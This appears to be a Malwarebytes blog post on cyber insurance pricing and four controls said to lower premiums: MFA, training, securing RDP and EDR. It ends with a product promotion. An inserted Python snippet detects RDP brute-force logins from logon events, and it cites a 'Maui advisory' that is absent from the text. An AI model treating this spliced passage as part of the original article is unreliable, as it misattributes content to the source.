A 2019 paper published in the Journal of Cybersecurity analyzed over 235 cyber insurance policies from New York, Pennsylvania, and California, as well as policies posted publicly on carriers’ websites. Its authors found that cyber insurance companies price their policies in one of four ways:

  • Base rate. Insurers provide a base premium based on your organization’s annual revenues or assets (or number of employees/students). The basic logic is that more revenue equals more risk, therefore higher premiums, and vice versa.
  • Base rate with security questions. Insurers look at your organization’s security posture to determine the final premium pricing. This was by far the most widely-used approach by insurers (57 percent of policies analyzed). 
  • Fixed rate. Insurers provide a fixed rate regardless of firm or industry. This was most common for smaller businesses.
  • Fixed rate with hazard groups. This is the same as fixed rate, but with a single modifier based on the amount of perceived risk a business has (such as how much sensitive information is stored on its website). Again, typical for small businesses.

How to save money on cyber insurance 

While it’s clear that the size of your business and the industry you’re in can affect costs, a large proportion of cyber insurance providers still look at your security posture to determine premiums.

So, what are some of the security controls that can lower your premium? 

For this article, we looked at security tips from the top five biggest cyber insurance companies—AXA XL, Chubb, AIG, Travelers, and AXIS—and found four commonalities across what they had to say. 

1. Use multi-factor authentication (MFA)

Did you know that, according to Verizon’s 2022 Data Breach Investigations Report, 50 percent of data breaches start with stolen credentials? 

Given this statistic, it’s no surprise that using multi-factor authentication (MFA) could signal to cyber insurers that you’re less of a risk. By requiring you to use multiple forms of authentication, MFA makes it much more difficult for threat actors to pull off brute force attacks, or to use stolen passwords.

2. Implement a cybersecurity training program

If stolen credentials are the most common initial attack vector in data breaches, then phishing is a close second—accounting for about 17 percent of all data breaches, according to the same Verizon report.

This is why implementing a cybersecurity training program for your employees is so important. 

A good training program should inform employees about common threats such as email phishing, spear phishing, and other common social engineering attacks. Cyber insurers are likely to view the implementation of such programs as a mark of high security maturity.

3. Disable Remote Desktop Protocol (RDP) services

In about 50 percent of ransomware attacks, Remote Desktop Protocol (RDP) was the initial attack vector, according to a study by Palo Alto Networks.

RDP is a network communications protocol that allows users to remotely control their devices. Commonly used by remote workers, RDP is also used by IT staff to troubleshoot problems on employees’ devices.

However, hackers can easily search for computers that expose RDP and then use a brute force attack to try to guess the password—and from there, they can carry out a ransomware attack.

Securing RDP with best practices, such as following the principle of least privilege, removes a potential point of access for hackers. Read our article on how to protect RDP for more tips.
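As an added defender-side example (not code from the Malwarebytes posts), the following Python flags the RDP password-guessing pattern described above, and in the "disable or harden RDP" step of the Maui advisory, from Windows Security log events, and separates bursts that ended in a successful logon, which need incident response rather than just a firewall block. The sample events, IP addresses and the simplified key=value line format are constructed assumptions.

```python
# Added example, not from the Malwarebytes post. Event ID 4625 is a failed
# Windows logon, 4624 a successful one; logon type 10 (RemoteInteractive) is
# the type used by RDP sessions, so other types are ignored here.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in a simplified key=value line format (a real
# export from wevtutil or a SIEM carries the same fields under other names).
SAMPLE_EVENTS = """\
2022-07-06T10:00:01 EventID=4625 LogonType=10 TargetUser=admin SourceIP=203.0.113.7
2022-07-06T10:00:09 EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.7
2022-07-06T10:00:15 EventID=4625 LogonType=10 TargetUser=backup SourceIP=203.0.113.7
2022-07-06T10:00:22 EventID=4625 LogonType=10 TargetUser=helpdesk SourceIP=203.0.113.7
2022-07-06T10:00:30 EventID=4625 LogonType=10 TargetUser=jsmith SourceIP=203.0.113.7
2022-07-06T10:01:02 EventID=4624 LogonType=10 TargetUser=jsmith SourceIP=203.0.113.7
2022-07-06T10:02:00 EventID=4625 LogonType=10 TargetUser=jsmith SourceIP=198.51.100.3
2022-07-06T10:03:00 EventID=4625 LogonType=3 TargetUser=svc SourceIP=203.0.113.9
2022-07-06T10:03:01 EventID=4625 LogonType=3 TargetUser=svc SourceIP=203.0.113.9
2022-07-06T10:03:02 EventID=4625 LogonType=3 TargetUser=svc SourceIP=203.0.113.9
2022-07-06T10:03:03 EventID=4625 LogonType=3 TargetUser=svc SourceIP=203.0.113.9
2022-07-06T10:03:04 EventID=4625 LogonType=3 TargetUser=svc SourceIP=203.0.113.9
"""

def parse_event(line):
    """Turn one log line into a dict; the timestamp lands under 'ts'."""
    ts, *fields = line.split()
    event = dict(f.split("=", 1) for f in fields)
    event["ts"] = datetime.fromisoformat(ts)
    return event

def rdp_bruteforce_report(text, threshold=5, window=timedelta(minutes=5)):
    """Return {source_ip: {"failures": n, "succeeded": bool}} for each source
    with >= threshold failed RDP logons inside a sliding time window.
    'succeeded' is set when the same source later gets a successful RDP logon,
    the case that needs incident response rather than just blocking."""
    events = [parse_event(l) for l in text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])
    fails, report = defaultdict(list), {}
    for e in events:
        if e["LogonType"] != "10":   # only RDP (RemoteInteractive) logons count
            continue
        ip = e["SourceIP"]
        if e["EventID"] == "4625":
            fails[ip].append(e["ts"])
            recent = [t for t in fails[ip] if e["ts"] - t <= window]
            if len(recent) >= threshold:
                report.setdefault(ip, {"failures": 0, "succeeded": False})
        elif e["EventID"] == "4624" and ip in report:
            report[ip]["succeeded"] = True
    for ip in report:
        report[ip]["failures"] = len(fails[ip])
    return report
```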

4. Deploy Endpoint Detection and Response (EDR)

According to Ponemon’s 2020 State of Endpoint Security Risk report, the average financial loss from endpoint attacks was almost $9 million in 2019.

Not surprisingly, then, both Travelers and AXIS explicitly mention endpoint protection as an important prevention measure.

Endpoint detection and response (EDR) is a form of endpoint protection that detects and protects against ransomware, malware, trojans, rootkits, backdoors, viruses, brute force attacks, and “zero-day” unknown threats. Learn more about how EDR can help secure your business.

Better security means better savings

Without cyber insurance, you can expect to pay a lot of cash to cover the cost of a data breach, and many companies are investing in it as a result. In this article, we explained how cyber insurance policies are typically priced, and how your organization’s assessed security posture is a prime consideration for many insurers. 

We also outlined four key processes and technologies that make you a much more challenging target to attack, and consequently a considerably less risky proposition for cyber insurers.

With Malwarebytes Endpoint Detection and Response, you can show cyber insurance companies you’re prepared to handle a cyberattack. To find out more, read how Mike Carney Toyota saved on cyber insurance by deploying Malwarebytes EDR.

The post 4 ways businesses can save money on cyber insurance appeared first on Malwarebytes Labs.